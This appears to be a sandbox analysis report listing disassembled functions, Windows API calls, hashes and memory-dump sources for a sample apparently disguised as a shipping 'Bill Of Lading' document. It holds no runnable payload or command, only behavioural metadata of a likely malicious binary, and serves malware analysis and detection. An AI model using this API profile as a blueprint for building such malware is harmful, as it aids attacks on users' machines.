                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                      • API String ID: 2574300362-58917771
                                                                                                                      • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                      • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                      • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                      • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                      Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                      • API String ID: 2574300362-3530519716
                                                                                                                      • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                      • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                      • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                      • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                      Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                      • API String ID: 2574300362-275556492
                                                                                                                      • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                      • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                      • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                      • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                      Function 0040EE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: IsWow64Process$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3024904723
                                                                                                                      • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                      • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                                                                      • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                      • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                                                                      Function 0040EEE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,0040E5BF,?), ref: 0040EEEB
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                      • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                                                                      • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                                                                                                                      • Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                                                                      • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                                                                                                                      Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: c8a8680659340ce3ae7b61d15611f915275d61821cdaab737acf418eefb31e18
                                                                                                                      • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                      • Opcode Fuzzy Hash: c8a8680659340ce3ae7b61d15611f915275d61821cdaab737acf418eefb31e18
                                                                                                                      • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                      Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __flush.LIBCMT ref: 00414630
                                                                                                                      • __fileno.LIBCMT ref: 00414650
                                                                                                                      • __locking.LIBCMT ref: 00414657
                                                                                                                      • __flsbuf.LIBCMT ref: 00414682
                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3240763771-0
                                                                                                                      • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                      • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                      • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                      • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                      Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                      • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                      • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyVariant$ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2286883814-0
                                                                                                                      • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                      • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                      • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                      • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                      Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                      • #21.WSOCK32 ref: 004740E0
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1881357543-0
                                                                                                                      • Opcode ID: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                                                                      • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                      • Opcode Fuzzy Hash: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                                                                      • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                      Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                      • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                      • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                      • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                      • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                      Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                      • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                                      • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                      • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                                      Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                      • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3321077145-0
                                                                                                                      • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                      • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                      • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                      • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                      Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 004505BF
                                                                                                                      • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                      • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                      • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Proc$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2351499541-0
                                                                                                                      • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                      • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                      • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                      • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                      Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                      • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                      • __itow.LIBCMT ref: 00461461
                                                                                                                      • __itow.LIBCMT ref: 004614AB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow$_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875217250-0
                                                                                                                      • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                      • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                      • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                      • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                      Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                        • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                        • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                        • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                      • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                      • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
